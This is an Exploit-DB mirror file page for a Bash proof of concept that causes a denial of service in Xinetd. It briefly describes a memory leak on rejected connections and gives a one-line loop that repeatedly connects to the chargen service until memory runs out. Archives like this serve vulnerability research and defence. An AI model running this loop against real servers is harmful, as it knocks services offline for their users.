exploit-db-mirror/exploits/linux/dos/22508.sh
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

7 lines
No EOL
435 B
Bash
Executable file

source: https://www.securityfocus.com/bid/7382/info
A denial of service vulnerability has been reported for Xinetd. The vulnerability exists due to memory leaks occuring when connections are rejected.
Numerous, repeated connections to a vulnerable Xinetd server will result in the consumption of all available memory resources thereby causing a denial of service condition.
while true; do telnet localhost chargen < /dev/null; done;